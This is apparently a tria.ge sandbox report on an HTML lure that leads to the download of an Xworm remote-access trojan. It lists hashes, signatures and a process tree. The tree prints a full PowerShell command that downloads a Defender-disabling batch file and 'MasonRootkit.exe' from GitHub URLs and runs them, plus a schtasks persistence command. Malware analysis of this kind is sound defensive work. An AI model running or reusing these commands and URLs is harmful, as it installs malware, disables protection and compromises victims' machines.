Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/03/2025, 23:26

General

  • Target

    qonPHJ.html

  • Size

    7KB

  • MD5

    aa5d13590623abb5d3963a8af5dfb85d

  • SHA1

    8dcb62e75f970ac4f9f78e2558f335951b599774

  • SHA256

    4c6183029dcf2e4d604c473c2dfb4f72037b6a8f13d9183b0842fd201e422d7a

  • SHA512

    94899bfebc29d4d76c1a8d0e9b787ae50386a5e8718194791d27d86eb7e67e1b0e1a9b0a4e68031905c767419bd767b9d2666ac5ffd0a8dd87c0bf842ac7282b

  • SSDEEP

    96:CMq9SlLh2B3Zq36uWl/PtxyjttJQ8Maoah3vL5LaNclmnU1Eh2sS:T1lLhwJrPahtJxMaoah3vG12sS

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Attributes
  • Install_directory

    %port%

  • install_file

    MultiTool.exe

  • pastebin_url

    https://pastebin.com/raw/qMaKVgj7

Signatures

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:604
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{96d28aa8-a8ae-48e9-a4d4-1df724c4d821}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1676
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:668
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:948
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:864
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1040
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1052
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                  1⤵
                    PID:1176
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1184
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1276
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1324
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1360
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1456
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2624
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault8fd57830h2adeh48a2h94ech625bd27f3fb5
                                    3⤵
                                      PID:2148
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcbb8446f8,0x7ffcbb844708,0x7ffcbb844718
                                        4⤵
                                          PID:5780
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1428,12433505247826278504,4431862883030952350,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:3
                                          4⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:5288
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                    1⤵
                                      PID:1468
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1508
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                        1⤵
                                          PID:1524
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1664
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                            1⤵
                                              PID:1680
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1752
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                1⤵
                                                  PID:1788
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1832
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1900
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:1908
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1996
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          1⤵
                                                            PID:1396
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2068
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                                PID:2096
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                1⤵
                                                                  PID:2184
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2300
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2432
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2440
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2644
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                          1⤵
                                                                            PID:2684
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2748
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                              1⤵
                                                                                PID:2776
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2792
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\qonPHJ.html
                                                                                  1⤵
                                                                                  • Enumerates system info in registry
                                                                                  • Modifies registry class
                                                                                  • NTFS ADS
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:3356
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcbb8446f8,0x7ffcbb844708,0x7ffcbb844718
                                                                                    2⤵
                                                                                      PID:2376
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
                                                                                      2⤵
                                                                                        PID:208
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
                                                                                        2⤵
                                                                                        • Downloads MZ/PE file
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:1316
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8
                                                                                        2⤵
                                                                                          PID:2012
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
                                                                                          2⤵
                                                                                            PID:3700
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
                                                                                            2⤵
                                                                                              PID:4464
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:8
                                                                                              2⤵
                                                                                                PID:3740
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:8
                                                                                                2⤵
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:944
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
                                                                                                2⤵
                                                                                                  PID:4212
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:968
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:5056
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:5208
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:5216
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:5404
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:5980
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:6056
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2648 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:4192
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5944 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:4812
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:4992
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6380 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:5276
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6276 /prefetch:2
                                                                                                                        2⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:5932
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
                                                                                                                        2⤵
                                                                                                                          PID:5772
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,4566565039675874628,15419094841938454276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:8
                                                                                                                          2⤵
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:3432
                                                                                                                        • C:\Users\Admin\Downloads\Mason-Babadoner-Multi-Tool.exe
                                                                                                                          "C:\Users\Admin\Downloads\Mason-Babadoner-Multi-Tool.exe"
                                                                                                                          2⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          • Executes dropped EXE
                                                                                                                          • NTFS ADS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4904
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
                                                                                                                            3⤵
                                                                                                                            • Blocklisted process makes network request
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Downloads MZ/PE file
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5328
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe"
                                                                                                                              4⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3184
                                                                                                                              • C:\ProgramData\MasonRootkit.exe
                                                                                                                                "C:\ProgramData\MasonRootkit.exe"
                                                                                                                                5⤵
                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:5352
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp11.tmp.bat""
                                                                                                                                5⤵
                                                                                                                                  PID:5288
                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                    timeout 3
                                                                                                                                    6⤵
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:2632
                                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                                              "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Mason-Babadoner-Multi-Tool" /tr "C:\Users\Admin\AppData\Roaming\Mason-Babadoner-Multi-Tool.exe"
                                                                                                                              3⤵
                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                              PID:5740
                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:3664
                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:4528
                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                              C:\Windows\System32\svchost.exe -k UnistackSvcGroup
                                                                                                                              1⤵
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4300
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
                                                                                                                              1⤵
                                                                                                                              • Drops desktop.ini file(s)
                                                                                                                              • Checks processor information in registry
                                                                                                                              • Modifies registry class
                                                                                                                              PID:6092
                                                                                                                            • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                              C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                                                                                                                              1⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:3224
                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                              C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
                                                                                                                              1⤵
                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                              • Modifies registry class
                                                                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:6120
                                                                                                                            • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                              C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                                                                                                                              1⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:676
                                                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:4452
                                                                                                                              • C:\Users\Admin\Downloads\Mason-Babadoner-Multi-Tool.exe
                                                                                                                                "C:\Users\Admin\Downloads\Mason-Babadoner-Multi-Tool.exe"
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4608

                                                                                                                              Network

